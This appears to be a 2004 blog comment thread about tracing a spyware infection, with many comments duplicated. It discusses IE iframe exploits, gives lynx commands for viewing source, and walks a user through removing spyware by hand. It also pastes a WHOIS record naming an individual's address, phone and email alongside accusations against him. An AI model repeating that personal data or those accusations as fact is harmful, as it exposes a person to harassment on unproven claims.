            It’s easy to see why a community such as LJ needs a mechanism to prevent its users from abusing one another by, for example, posting private information about other members; in some cases (say, in the case of a person seeking to escape an abusive spouse), publishing this kind of information can be extremely dangerous.

            On the other hand, information which is already public is…well, already public. The name of the President of the United States is public; therefore, claiming that a post which names the President violates LJ’s TOS would be absurd. In the URL you posted, what happened is, I believe, along the lines of someone posting the President’s name; to say that this information is not public seems pretty silly. A person who does not wish to be associated with his statements should not make those statements in public.

            Similarly, information that is published in Whois records, for example, is clearly already public.

            I can see a hard and clear distinction between, say, a post that uses my name and says “This person is the registered owner of record of the domain name ‘www.xeromag.com'” and a post that uses my name and says “Franklin lives at this address, and at two o’clock this morning we’re all going to his house to murder him with pickaxes, anyone want to join us?” In my mind, and (one would hope) in the minds of any reasonable abuse person at any reasonable ISP or Web forum, the distinction between these things is obvious.

            I guess we’ll see what happens…

          • Re: Nice.

            You’ve said exactly what any person who can both think and breathe at the same time has said.

            I said to LJ Abuse, that public information, by definition, can’t be a violation of privacy – especially something clearly self-published like your name. They argued that with me. Seriously. To LJ Abuse any information that is personally identiable (even a name like John Smith, so common it isn’t personally identifiable) is a violation of the TOS.

            And yes, I’m hoping to raise your hackles about such a stupid ass policy in a lame attempt to make more LJ users vocally complain about it.

          • Re: Nice.

            I posted the text of a spam email to an LJ forum (it was an invite to join an email group similar to the forum and I was curious to know if others in the group had received the same spam as it had come to an address that I don’t use for any group email)

            The spammer’s name and business address were in the spam and I had my account suspended for that.

            I wrote them a WTF letter — the guy’s name was part of the business name: John Doe Consulting so it was public record anyway. Then went in and very snarkily changed the “personal details” and posted that I’d done so in order to comply with the TOS and protect spammer’s rights.

            But I did get my account back.

    • Re: Nice.

      Oh, and Tacit – my #1 way, even before the firewall and other stuff, to protect my idiot relatives (and any of them that browse iWon.com all day are idiots, I’ve got a few) is to set up their user account as NOT an administrator. All the junk cant install if they don’t have the administrative rights to install the files and registry garbage.

      • Re: Nice.

        An excellent idea. I wish that Windows did this by default, and I also wish the Windows security model were closer to Unix in that even with an administrator account, the user must still validate by entering his password before doing anything that could potentially be destructive.

  17. Viewing HTML Source Safely

    I think one of the safest ways to do the research you describe would be to use Lynx instead of anything graphical. Available for Linux and Windows (and working on a Mac port, it seems), it’s easy to just download the source and display it on the screen.

    lynx -source http://yoururlhere.tld/yadda/yadda/yadda/biginfection.html

    will dump the source code to the screen.

    Another item of interesting is using the -head option to just retrieve and display the header. For the first URL you listed (the start of the journey to infection):

    HTTP/1.1 200 OK
    Date: Tue, 09 Nov 2004 16:05:49 GMT
    Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_python/2.7.8 Python/1.5.2 mod
    _ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.3 PHP/4.3.7 mod_perl/1.26
    Last-Modified: Mon, 18 Oct 2004 03:00:17 GMT
    ETag: “330223-90-417331c1”
    Accept-Ranges: bytes
    Content-Length: 144
    Connection: close
    Content-Type: text/html

    Lynx can be found at http://lynx.browser.org/. And no, I’m not a developer; I’m just someone who gets a lot of utility out of the program.

    A very good writeup. Thanks for the information.

    — Matt

  18. Re: Nice.

    They will let him slide as long as nobody complains. Spammers and net-assholes should be exposed to the light of day in any way possible, but LJ protects them. IN LJ Abuse’s opinion, just revealing the first and last NAME of someone else is a TOS violation – never mind the address, phone, whatever.

    I’d heard that LJ Abuse was a bunch of power-mad idiots before – but the people screaming were abusive themselves. Then this happened: http://www.cetan.com/wordpress/index.php?p=55 and the same guy got me suspended.

  19. Re: Nice.

    Oh, and Tacit – my #1 way, even before the firewall and other stuff, to protect my idiot relatives (and any of them that browse iWon.com all day are idiots, I’ve got a few) is to set up their user account as NOT an administrator. All the junk cant install if they don’t have the administrative rights to install the files and registry garbage.

  20. Re: are we safe?

    Yes, though even if you use Firefox, it’s still important to run Windows Update on a regular basis. There are security vulnerabilities in Internet Explorer which can be exploited even if you are not using Explorer as your browser.

  21. Re: Nice.

    An excellent idea. I wish that Windows did this by default, and I also wish the Windows security model were closer to Unix in that even with an administrator account, the user must still validate by entering his password before doing anything that could potentially be destructive.

  22. Re: Nice.

    Interesting writeup. If the LJ TOS can be interpreted in this way, then a post such as “George Bush is a lousy president” violates the LJ TOS.

    It’s easy to see why a community such as LJ needs a mechanism to prevent its users from abusing one another by, for example, posting private information about other members; in some cases (say, in the case of a person seeking to escape an abusive spouse), publishing this kind of information can be extremely dangerous.

    On the other hand, information which is already public is…well, already public. The name of the President of the United States is public; therefore, claiming that a post which names the President violates LJ’s TOS would be absurd. In the URL you posted, what happened is, I believe, along the lines of someone posting the President’s name; to say that this information is not public seems pretty silly. A person who does not wish to be associated with his statements should not make those statements in public.

    Similarly, information that is published in Whois records, for example, is clearly already public.

    I can see a hard and clear distinction between, say, a post that uses my name and says “This person is the registered owner of record of the domain name ‘www.xeromag.com'” and a post that uses my name and says “Franklin lives at this address, and at two o’clock this morning we’re all going to his house to murder him with pickaxes, anyone want to join us?” In my mind, and (one would hope) in the minds of any reasonable abuse person at any reasonable ISP or Web forum, the distinction between these things is obvious.

    I guess we’ll see what happens…

  23. Re: Viewing HTML Source Safely

    That’s a most excellent suggestion. I’d like to see Lynx available for Macs, as I don’t feel comfortable doing this kind of research from a Windows box regardless of the type of browser, though I think I’m going to install Lynx on my Linux box this evening. It looks like a good tool for the arsenal. Thanks!

  24. Re: Nice.

    You’ve said exactly what any person who can both think and breathe at the same time has said.

    I said to LJ Abuse, that public information, by definition, can’t be a violation of privacy – especially something clearly self-published like your name. They argued that with me. Seriously. To LJ Abuse any information that is personally identiable (even a name like John Smith, so common it isn’t personally identifiable) is a violation of the TOS.

    And yes, I’m hoping to raise your hackles about such a stupid ass policy in a lame attempt to make more LJ users vocally complain about it.

  25. Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
    The Russian-hosted Web site is:

    http://213.159.98.203/ = Adsavior.com

    11/08/04 11:05:06 dns Adsavior.com
    Adsavior.com NS (Nameserver) ns1.adsavior.biz
    Adsavior.com NS (Nameserver) ns2.adsavior.biz
    Adsavior.com A (Address) 213.159.98.203
    mail.Adsavior.com A (Address) 213.159.98.209
    ns1.adsavior.biz A (Address) 213.159.98.204
    ns2.adsavior.biz A (Address) 213.159.98.208

    Organization:
    Adsavior Inc.
    James Finlayson
    #395-1027 Davie St.
    Vancouver, bc V6E4L2
    CA
    Phone: 6046969057
    Email: jamesinflames69@hotmail.com
    Registrar Name….: Register.com
    Registrar Whois…: whois.register.com
    Registrar Homepage: http://www.register.com
    Domain Name: ADSAVIOR.COM
    Created on…………..: Thu, Sep 16, 2004
    Expires on…………..: Fri, Sep 16, 2005
    Record last updated on..: Mon, Oct 04, 2004

    It appears that linkey.ru and IPs in the same general block as “Adsavior.com” are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

  26. Additional information from a helpful reader on the news.admin.net-abuse.email newsgroup:
    The Russian-hosted Web site is:

    http://213.159.98.203/ = Adsavior.com

    11/08/04 11:05:06 dns Adsavior.com
    Adsavior.com NS (Nameserver) ns1.adsavior.biz
    Adsavior.com NS (Nameserver) ns2.adsavior.biz
    Adsavior.com A (Address) 213.159.98.203
    mail.Adsavior.com A (Address) 213.159.98.209
    ns1.adsavior.biz A (Address) 213.159.98.204
    ns2.adsavior.biz A (Address) 213.159.98.208

    Organization:
    Adsavior Inc.
    James Finlayson
    #395-1027 Davie St.
    Vancouver, bc V6E4L2
    CA
    Phone: 6046969057
    Email: jamesinflames69@hotmail.com
    Registrar Name….: Register.com
    Registrar Whois…: whois.register.com
    Registrar Homepage: http://www.register.com
    Domain Name: ADSAVIOR.COM
    Created on…………..: Thu, Sep 16, 2004
    Expires on…………..: Fri, Sep 16, 2005
    Record last updated on..: Mon, Oct 04, 2004

    It appears that linkey.ru and IPs in the same general block as “Adsavior.com” are well known for Net abuse. Mr. Finlayson, another Canadian, appears to be deeply involved in this particular virus/adware gang as well.

  27. Another followup, courtesy of a regular in the NANAE newsgroup:

    http://www.computing.net/security/wwwboard/forum/13517.html

    This page describes another user’s problem very similar to the one I dealt with on Shelly’s computer, and confirms that Rackspace is dirty–they know what their clients are doing, and they approve and condone this activity. in particular, here is the text of a reply sent by Rackspace to another user who wrote to Rackspace and complained they were hosting virus droppers:

    “From: abuse@rackspace.com [mailto:abuse@rackspace.com]
    Sent: Friday, September 24, 2004 3:42 AM
    To: steve
    Subject: [Incident 040923-000056] http://69.20.56.3/yyy10.html

    Recently you requested personal assistance from our on-line support center. Below is a summary of your request and our response.

    If we do not hear from you within 48 hours we will assume your issue has been resolved.

    Thank you for allowing us to be of service to you.

    Subject
    —–
    http://69.20.56.3/yyy10.html

    Suggested Answer
    —–
    At 09/24/2004 03:42 AM we wrote –

    Hello,

    Please send an email to info@look2me.com and ask for the uninstall script. If you would rather give them a phone call, they can be reached at 866-705-2728. Please update this ticket if you do not hear back from them within 48 hours and we will contact the customer.

    Regards,
    Sydney McHale
    Rackspace Managed hosting (TM)”

    I was right–Rackspace knows EXACTLY what’s going on, but since Rackspace is making money on it, Rackspace doesn’t care. Dirty, dirty, dirty.

      • If you read between the lines, what Rackspace is saying is:

        “Yes, we know our client is planting adware on people’s computers. Yes, we support and condone this behavior. We will not terminate our client; instead, we’ll just ask you to ask the client for adware removal software.”

        The problem is, Rackspace’s dirty client is planting the spyware using redirectors and Explorer security vulnerabilities, and hiding the source o fthe adware by redirecting through servers in other countries. Anyone who lacks the technical skill (and the six hours of work) required to track the infection down to the Rackspace client would never know to contact Rackspace’s client for the removal tool.

        Rackspace knows what their client is doing. they know their client is planting adware. They know their client is taking incredible measures to conceal his identity. they know their client is planting the adware using Explorer exploits. They don’t care; they do not consider this activity “abuse,” and they do not terminate people for doing this. Therefore, Rackspace is dirty.

        • If you read between the lines […]
          If you do, you assume. If you assume, your arguments are null and void as they are not based on facts, but assumptions.
          I understand what you’re saying, but unless you try to follow at the very least, you can’t even do anything about them but rant and rave.
          And what’s that going to do? Don’t waste your time; make it count. They can be brought to court.

  28. Another followup, courtesy of a regular in the NANAE newsgroup:

    http://www.computing.net/security/wwwboard/forum/13517.html

    This page describes another user’s problem very similar to the one I dealt with on Shelly’s computer, and confirms that Rackspace is dirty–they know what their clients are doing, and they approve and condone this activity. in particular, here is the text of a reply sent by Rackspace to another user who wrote to Rackspace and complained they were hosting virus droppers:

    “From: abuse@rackspace.com [mailto:abuse@rackspace.com]
    Sent: Friday, September 24, 2004 3:42 AM
    To: steve
    Subject: [Incident 040923-000056] http://69.20.56.3/yyy10.html

    Recently you requested personal assistance from our on-line support center. Below is a summary of your request and our response.

    If we do not hear from you within 48 hours we will assume your issue has been resolved.

    Thank you for allowing us to be of service to you.

    Subject
    —–
    http://69.20.56.3/yyy10.html

    Suggested Answer
    —–
    At 09/24/2004 03:42 AM we wrote –

    Hello,

    Please send an email to info@look2me.com and ask for the uninstall script. If you would rather give them a phone call, they can be reached at 866-705-2728. Please update this ticket if you do not hear back from them within 48 hours and we will contact the customer.

    Regards,
    Sydney McHale
    Rackspace Managed hosting (TM)”

    I was right–Rackspace knows EXACTLY what’s going on, but since Rackspace is making money on it, Rackspace doesn’t care. Dirty, dirty, dirty.

  29. Re: Viewing HTML Source Safely

    Just a note:
    The head on that apache server shows that it’s quite out of date, and is subject to numerous vulnerabilities.

  30. Re: are we safe?

    I showed the last redirect (starts object id=install) to the webmaster at my job and he said that ALL browsers would be vulnerable to this exploit. Would you be so kind as to explain how this exploit works in IE and why Firefox is safe.
    Thank you in advance,
    Joel Adams

  31. Re: are we safe?

    The key behind the exploit is that in Explorer, it loads the “install007.exe” application without asking you first. It should load the application only after asking you, which is (I believe, though I have not tested it) what would happen in a different browser. Any browser can, in theory, load the installer, but not without your permission.

  32. Re: virii

    I will. It’s odd. You’d think that without a job, I’d have plenty of time but I spend a lot of time in interviews and preparing things and such. Still, I should allocate the time.

  33. Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.

    Nope, sorry. I don’t bother with a firewall or “antivirus” software, either. I don’t know how everyone else gets so much of this stuff. Probably Outlook.

    Do NOT visit this URL if you are on a Windows machine; you WILL become infected.

    No, I won’t. IE asks me if I would like to install something, and I say no. End of story. I’m using IE6 with more or less the default settings, and it’s probably even a few patches behind the curve, since I haven’t yet applied SP2 here. Perhaps you need to change “Download signed ActiveX controls” to something other than “Enable”.

    • “No, I won’t. IE asks me if I would like to install something, and I say no. End of story.”

      Try it.

      The iFrame exploit is an exploit that will cause Explorer to download and run any executable without asking you, even if you have instructed Explorer not to download ActiveX controls (or anything else). All versions of Explorer except the one that ships with XP ervice pack 2 are vulnerable; all will download and run executables without informing the user, regardless of the user’s settings.

      Many viruses and adware/spyware sread using this or other Explorer vulnerabilities. Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs? You might just be surprised.

      • Ah, I didn’t realize the behavior was different when nested in an IFRAME. It was clearly downloading the executable before asking any questions, but that was probably only to verify the signature. Why the warnings about the final link, then?

        Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs?

        Yes, quite sure. Never. I don’t particularly mind sites sharing cookies, and I know all the various ways things can make themselves run at startup in Windows. Most of the “ad-busting programs” to which you refer use a signature database, just like a virus scanner, which is entirely the wrong way to go about it. Try HijackThis next time you have a problem.

        Naturally I would notice if advertisements were spontaneously appearing on my computer; and occasionally I need to watch all IP traffic to my desktop, so I would notice anything really sneaky phoning home at that time.

        You might just be surprised.

        What, is the virus threat level orange today? You can’t scare me, I have backups. None of this stuff surpasses the level of “nuisance”, and I’m not going to pay Symantec for a tool which wouldn’t help anyway.

          • Switching is impossible when one of the main reasons you need Windows at all is to support a web application which only works in IE. Besides, Mozilla doesn’t help you with hole-of-the-month in some RPC service, or when you have to use Outlook. Finally, IE is more convenient, because it’s always loaded.

            Mozilla is a nice product, but using it exclusively is not a “no-brainer” in my case.

          • You’re making it harder than it has to be. Just use IE when you have to, and switch to another browser the rest of the time. What’s so hard about that?

          • It’s not particularly difficult, it’s just not a win for me. I don’t want to have two streams of URL history to search, or two sets of hotkeys to remember. I occasionally use Mozilla for debugging Javascript, but haven’t yet found it worthy of routine use.

        • All my ad-busting and anti-virus software is free.

          I never had any sign of problems — yet my machine was VERY infected the first time I scanned.

          Your choice, of course. If people seema bit angsty on the issue, it is likely because one thing the malware can do is use unsuspecting machines to further propagate themselves. It therefore behooves all of us to ensure that each and every one of us is protected.

          As with terrorism and STDs, it is important to remember that the individuals’ judgement must rule as regards what level of protection he is comfortable with, however.

          I think people often forget that. I know *I’d* be pretty pissed if someone came down my street locking everybody’s front doors — for their own safety.

          • I never had any sign of problems — yet my machine was VERY infected the first time I scanned.

            I’ve cleaned several officemates’ computers, I’m sure I know what to look for.

            If people seema bit angsty on the issue, it is likely because one thing the malware can do is use unsuspecting machines to further propagate themselves.

            Spyware and popup spam are mostly disjoint from worms.

  34. Yes, you. Even if you are technically literate, you have a firewall, and you never download suspicious attachments, you are almost certainly infected.

    Nope, sorry. I don’t bother with a firewall or “antivirus” software, either. I don’t know how everyone else gets so much of this stuff. Probably Outlook.

    Do NOT visit this URL if you are on a Windows machine; you WILL become infected.

    No, I won’t. IE asks me if I would like to install something, and I say no. End of story. I’m using IE6 with more or less the default settings, and it’s probably even a few patches behind the curve, since I haven’t yet applied SP2 here. Perhaps you need to change “Download signed ActiveX controls” to something other than “Enable”.

  35. I’m currently using FireFox, and it doesn’t make that big a difference, really. If I go a week or so without running SpyBot, when I finally do run it, it finds SKAJILLIONS of spyware. (Spywares?)

    I have it running automatically every night; almost every morning, it tells me it’s found five items. I don’t know if they’re the SAME five items that are simply resisting removal, or if I just pick them up on my usual daily rounds of websurfing.

  36. Typo

    I think that should be ‘Pest Patrol’ not patron. It isn’t freeware, so I haven’t gotten around to using it yet, but their website allows you to perform a scan on your system that catches stuff (like a particular IE toolbar I absolutely loathe) the AdAware and Spybot can’t. (I removed so much garbage from my parent’s computer I can’t be sure what did what, but anything that appends a gigantic ad to the top of your homepage when you start your browser, requiring you to scroll down to view the site, necessitates deaths instead of legal action.)

  37. “No, I won’t. IE asks me if I would like to install something, and I say no. End of story.”

    Try it.

    The iFrame exploit is an exploit that will cause Explorer to download and run any executable without asking you, even if you have instructed Explorer not to download ActiveX controls (or anything else). All versions of Explorer except the one that ships with XP ervice pack 2 are vulnerable; all will download and run executables without informing the user, regardless of the user’s settings.

    Many viruses and adware/spyware sread using this or other Explorer vulnerabilities. Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs? You might just be surprised.

  38. I’ve been using firefox for a couple of months now and haven’t picked up a singe piece of spyware. None that spambot or adaware have picked up on anyway. With IE I was picking up about 40 a week.

    Perhaps there’s a setting that needs tweaking somewhere?

  39. Re: Nice.

    I posted the text of a spam email to an LJ forum (it was an invite to join an email group similar to the forum and I was curious to know if others in the group had received the same spam as it had come to an address that I don’t use for any group email)

    The spammer’s name and business address were in the spam and I had my account suspended for that.

    I wrote them a WTF letter — the guy’s name was part of the business name: John Doe Consulting so it was public record anyway. Then went in and very snarkily changed the “personal details” and posted that I’d done so in order to comply with the TOS and protect spammer’s rights.

    But I did get my account back.

  40. Re: are we safe?

    (Coming at you via ‘s LJ…)

    I’ve recently run into a spyware dropper that, although not silent, still has FF and all other ‘zilla browsers attempt to install spyware. Here’s a screenshot (hosted on my own web server):

    http://www.caspeed.com/lj04/webbug1.png

    The javascript that drops the spyware has a section expressly devoted to Netscape installs. If the user is clueless and clicks install anyways, they get the bug.

    It’s only a matter of time before Zilla family browsers have a serious hijacker written for them. Enough people will click the install button anyways that it will be worth the spammers effort to do so.

    More on this exploit attempt in my own blog at: http://www.livejournal.com/users/makovette/393159.html

    CYa!
    Mako

  41. Quite Interesting!

    I’m not sure how this relates, but IndyMedia’s Servers, hosted at a Rackspace Co-lo in London were siezed based on a warrant served to the Texas location, from some third party government (apparently Italy). With not a whole lot of due-process or explanation going on. IndyMedia was accused of the usual Terrorist ties, information denied for National Security, etc.

    I just found it very interesting that it was Rackspace involved in your search and problem.

  42. Quite Interesting!

    I’m not sure how this relates, but IndyMedia’s Servers, hosted at a Rackspace Co-lo in London were siezed based on a warrant served to the Texas location, from some third party government (apparently Italy). With not a whole lot of due-process or explanation going on. IndyMedia was accused of the usual Terrorist ties, information denied for National Security, etc.

    I just found it very interesting that it was Rackspace involved in your search and problem.

  43. Thanks.

    I was pointed this way by . Verrrrry very interesting essay. Thanks for going into all the trouble of writing your experience with scumbags down—the more we are informed, the better protected we are.

  44. Thanks.

    I was pointed this way by . Verrrrry very interesting essay. Thanks for going into all the trouble of writing your experience with scumbags down—the more we are informed, the better protected we are.

  45. Ah, I didn’t realize the behavior was different when nested in an IFRAME. It was clearly downloading the executable before asking any questions, but that was probably only to verify the signature. Why the warnings about the final link, then?

    Are you sure you aren’t infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs?

    Yes, quite sure. Never. I don’t particularly mind sites sharing cookies, and I know all the various ways things can make themselves run at startup in Windows. Most of the “ad-busting programs” to which you refer use a signature database, just like a virus scanner, which is entirely the wrong way to go about it. Try HijackThis next time you have a problem.

    Naturally I would notice if advertisements were spontaneously appearing on my computer; and occasionally I need to watch all IP traffic to my desktop, so I would notice anything really sneaky phoning home at that time.

    You might just be surprised.

    What, is the virus threat level orange today? You can’t scare me, I have backups. None of this stuff surpasses the level of “nuisance”, and I’m not going to pay Symantec for a tool which wouldn’t help anyway.

  46. When it comes to scanning for viruses and other malware, I think we need to reiterate an axiom from 20 years ago: the only way to reliably scan a system is after it’s been booted from provably-clean media, with no programs/drivers/etc. whatsoever loaded from the potentially-infected drives.

    Unfortunately Windows makes this difficult at best.

  47. When it comes to scanning for viruses and other malware, I think we need to reiterate an axiom from 20 years ago: the only way to reliably scan a system is after it’s been booted from provably-clean media, with no programs/drivers/etc. whatsoever loaded from the potentially-infected drives.

    Unfortunately Windows makes this difficult at best.

  48. If this particular spyware qualifies as a virus, can’t the original perps be prosecuted under the Homeland Security Act? (I.E. use that fascist HS organization FOR OUR benefit?)

    Wouldn’t that be nice?

  49. If this particular spyware qualifies as a virus, can’t the original perps be prosecuted under the Homeland Security Act? (I.E. use that fascist HS organization FOR OUR benefit?)

    Wouldn’t that be nice?

  50. Switching is impossible when one of the main reasons you need Windows at all is to support a web application which only works in IE. Besides, Mozilla doesn’t help you with hole-of-the-month in some RPC service, or when you have to use Outlook. Finally, IE is more convenient, because it’s always loaded.

    Mozilla is a nice product, but using it exclusively is not a “no-brainer” in my case.

  51. *Growl…* I hate the way these companies work… Ugh.
    i’ll have to take more caution from now on. Oi. I just wish we could prosecute them and actually find a way to prove them guilty.
    I’m going to add this to my memories. It’s an important write-up, and I thank you for it.

  52. *Growl…* I hate the way these companies work… Ugh.
    i’ll have to take more caution from now on. Oi. I just wish we could prosecute them and actually find a way to prove them guilty.
    I’m going to add this to my memories. It’s an important write-up, and I thank you for it.

  53. My work machine (btw- this is a lab for the state of Georgia) has that damned ‘well-known scourge of the internet’ “anti-spyware” POS.

    I can’t kill it (the state boys have tried – it just comes back)- my old box runs on windoze 95(I’m supposed to get a new system by the end of the year so the story goes..) and so most anti-spyware stuff won’t work. Other than nuke and pave, all I can do is to control it with various pop-up and home page blockers.

    OTHO – my home beast is _clean_. One thing that will stop these malicous spyware bastaards is to manage your cookies. Most of these need a ‘trigger’ – and if it doesn’t know where it is – it won’t start. I/m also very leary of certain sites and have a firewall and anti-spyware/virus stuff.

    And don’t use IE – that is a disaster waiting to happen. Use Mozilla or at least Netscape 7.2 so you can control your box’s security.

  54. My work machine (btw- this is a lab for the state of Georgia) has that damned ‘well-known scourge of the internet’ “anti-spyware” POS.

    I can’t kill it (the state boys have tried – it just comes back)- my old box runs on windoze 95(I’m supposed to get a new system by the end of the year so the story goes..) and so most anti-spyware stuff won’t work. Other than nuke and pave, all I can do is to control it with various pop-up and home page blockers.

    OTHO – my home beast is _clean_. One thing that will stop these malicous spyware bastaards is to manage your cookies. Most of these need a ‘trigger’ – and if it doesn’t know where it is – it won’t start. I/m also very leary of certain sites and have a firewall and anti-spyware/virus stuff.

    And don’t use IE – that is a disaster waiting to happen. Use Mozilla or at least Netscape 7.2 so you can control your box’s security.

    • Because it’s not a priority.

      They can barely be bothered to do anything about identity theft, phishing sites, advanced-fee scams, and pyramid schemes; it’s simply not a priority.

  55. Might one ask where you did put them? I would like to come up with some good alternatives to present to someone who’s looking into corporate hosting on their servers.

  56. Check out SpywareBlaster – it’ll stop IE and Firefox from bringing in new spyware/adware bots onto your computer in the first place. Either google it, or there’s a link inside of SpyBot (if ya question its authenticity), but it works awesomely.

  57. currently dealing with said infection via long distance…

    happy to report – 6 days into what seems like hell we are making progress…

    I use firefox personally, I have a router and I use system works, I use a few reg mechanic like programs for maint, that includes spython – after a new in the background bi monthly maint schedule – I am happy to report – nada on the virus/?ware end – I am still running 98_se on all three machines – and am a wee bit aprehensive to move into the xp playing field.

    Breklor sent me here, and I’ll pass on the news,

    I really do appreciate your comments – as they are of great help.

    Light and Love

  58. currently dealing with said infection via long distance…

    happy to report – 6 days into what seems like hell we are making progress…

    I use firefox personally, I have a router and I use system works, I use a few reg mechanic like programs for maint, that includes spython – after a new in the background bi monthly maint schedule – I am happy to report – nada on the virus/?ware end – I am still running 98_se on all three machines – and am a wee bit aprehensive to move into the xp playing field.

    Breklor sent me here, and I’ll pass on the news,

    I really do appreciate your comments – as they are of great help.

    Light and Love

  59. I have five persistent DSO exploits that Spybot finds EVERY TIME. I am sure it’s the same infection.

    I almost never get new spyware infections since switching to FireFox.

    Is it possible you have an IE hijack that’s still running IE spyware installs even when you’re not using it?

  60. I was thinking the same thing.

    I used to do something similar on the college library. I would trace back who installed software that shouldn’t be there. It eventually started to lead to a group of young men. They turned out to be crackers. They’d managed to gain root on a couple of our servers. The most we were able to do to them, though, was to ban them from the lab, since the dean was friends with one’s mother. *shrugs*

  61. extortion

    When spy/malware infects your computer, takes over your browser with start-up pages, pop-ups and pushing sex sites on you and then follows up with “spyware removal” – this is

    My state computer has this crap now and though its “managed” or contained to a degree, its still around waiting. I’d love to see if I can convince the state to use their much more mighty powers to nail these bastards.

    Or how about a large class-action suit? Thoughts on this?

  62. extortion

    When spy/malware infects your computer, takes over your browser with start-up pages, pop-ups and pushing sex sites on you and then follows up with “spyware removal” – this is

    My state computer has this crap now and though its “managed” or contained to a degree, its still around waiting. I’d love to see if I can convince the state to use their much more mighty powers to nail these bastards.

    Or how about a large class-action suit? Thoughts on this?

  63. All my ad-busting and anti-virus software is free.

    I never had any sign of problems — yet my machine was VERY infected the first time I scanned.

    Your choice, of course. If people seema bit angsty on the issue, it is likely because one thing the malware can do is use unsuspecting machines to further propagate themselves. It therefore behooves all of us to ensure that each and every one of us is protected.

    As with terrorism and STDs, it is important to remember that the individuals’ judgement must rule as regards what level of protection he is comfortable with, however.

    I think people often forget that. I know *I’d* be pretty pissed if someone came down my street locking everybody’s front doors — for their own safety.

  64. I never had any sign of problems — yet my machine was VERY infected the first time I scanned.

    I’ve cleaned several officemates’ computers, I’m sure I know what to look for.

    If people seema bit angsty on the issue, it is likely because one thing the malware can do is use unsuspecting machines to further propagate themselves.

    Spyware and popup spam are mostly disjoint from worms.

  65. It’s not particularly difficult, it’s just not a win for me. I don’t want to have two streams of URL history to search, or two sets of hotkeys to remember. I occasionally use Mozilla for debugging Javascript, but haven’t yet found it worthy of routine use.

    • Which version of Windows do you use?

      My mother was infected with something very similar just a few weeks ago. I or somebody else listening could probably walk you through the steps to get rid of your problem.

        • –First off, I don’t know you and I don’t know what you know, so I have to assume from the start that you don’t know anything. If I’m insulting your intelligence, I apologize–

          Okay… first thing you should do is open up a browser window to this site.

          This is what we’ll use to find the problem in the first place. If you have a second computer in your house, you should use the uninfected computer to go to this site. If not, we’ll just have to make do.

          Next, hit the “Ctrl”, “Alt” and “Del” buttons at the same time. A menu should come up on your screen with about six buttons. One of them should be called ‘Task Manager’. Click on that button and another window comes up. There should be three tabs towards the top – ‘Applications’, ‘Processes’ and ‘Performance’. We want to click on the one named ‘Processes’.

          Make sure you have a piece of paper and a pencil for the next part. In the first column in your Task Manager window should be a big list of names. These are all the ‘processes’, which mean all the programs that are currently running on your computer. The bad programs causing your problems are in here somewhere. Your web page is open to the Process Library, a site that tries to catalog every process from every program there is. It’s not complete, but it’s a good place to start.

          Look at the first process name in your task manager window, I want you to type that name into the search engine at Process Library. It’s that big blue box that says ‘Search for a Process’. Hit the ‘Search Now!’ button, and if there is an entry for your process, it will be displayed.

          Look at the description of the process. If it says your process ‘is a part of the Microsoft Windows Operating System”, then we know it’s ok. If it says that it’s related to some piece of software that you know you’ve got on your computer, or some piece of hardware that you know you have (like your printer), that’s ok too. If it says that the process is related to a known virus, write the name down. If it can’t find the process in the library, write that down too. If it says that a process belongs to something that you don’t think is on your computer, write that down too.

          Go through the whole list of processes like this, and write down the names of every one that look suspicious.

          Post that list as a response here, or email it to me, or post it as a comment on my journal.

          • I FINALLY did it

            Sorry it’s taken me so long to actually DO this… it’s been Finals, and you can imagine how hectic it has been. Firstly, thank you very much for your patient indications, I followed through and found the following:

            Processes Not found in Library:
            WPC54CFG.exe
            OdHost.exe
            TabUserW
            ScannerFinder.exe (I suspect this may be tied to my Microtek scanner?)
            NICServ.exe

            Spyware Found (which Spybot seems to have failed to remove):
            ViewMgr.exe (ViewPoint Media Player)

            No mention of VX2, though– and today Spybot , for the first time, eliminated VX2 from its list of bogies without telling me it couldn’t remove this or that component related to it. However, it seems to have passed VMP by.
            I wait for your feedback. And thanks again πŸ™‚

          • Re: I FINALLY did it

            Okay… I’m looking in a few other places for details on your processes…

            WPC54CFG.exe is a utility used by the Linksys Wireless-G Notebook adapter. OdHost.exe and NICServ.exe are also associated with this piece of hardware. If you have one of these, then these processes are ok.

            TabUserW is a driver for a Wacom pen tablet. Same as above.

            ScannerFinder.exe is, as you suspected, related to your Microtek scanner.

            If Spybot got rid of VX2 for you, then looks like ViewMgr.exe is the only remaining problem.

            This next part is a bit dangerous for normal users. Print this out, and do exactly what it says.

            Click the Start button, then click Run and type in ‘regedit’ in the box that comes up. This is the Registry Editor. You don’t want to make any changes here – if you change the wrong values, you make your applications or even your entire operating system stop working.

            There should be two panes in the regedit window. At the very top of the left pane, there should be a little computer icon that says ‘My Computer’ next to it. Click on that one to highlight it, then in the Menu bar click Edit, then Find. In the box that comes up, type in ‘ViewMgr’, and click ‘Find Next’.

            It might take a minute to find the entry, and there may be more than one. You can use the F3 key to find the next entry. The registry entry you’re looking for should be in a folder named ‘Run’. (The folders are in the left pane.) In the right pane you should see several columns. If you’ve got the right entry, ViewMgr should appear under ‘Name’. Under ‘Data’ should be the complete name and path of a program. Write it down. Everything from “C:\(whatever)” to “\(whatever).exe”. When you’ve written down this file name, click ‘Registry’ and ‘Exit’ in the Menu bar without making any changes.

            Next you need to reboot. While your computer is booting, hit F8 repeatedly. This should bring us a text menu with several different booting options. If the menu doesn’t come up, reboot and try again. When the menu comes up, what we want is an entry that says something like “Recovery Console with Command Prompt Only” or possibly “Safe Mode with Command Prompt”. If there’s nothing like that there, we can probably make due with the option that says “Safe Mode”.

            If you can get the command prompt option, you’ll boot to a simple black screen with words on it, just like an old DOS computer. Type in “DEL”, then a space, then that whole name you wrote down earlier. It should be something like “DEL C:\(directory names)\(program).exe”. Type that in exactly, and hit return. Then restart the computer again (just hit the reset button, or turn it off and back on again), and run Spybot one last time. Everything should be ok.

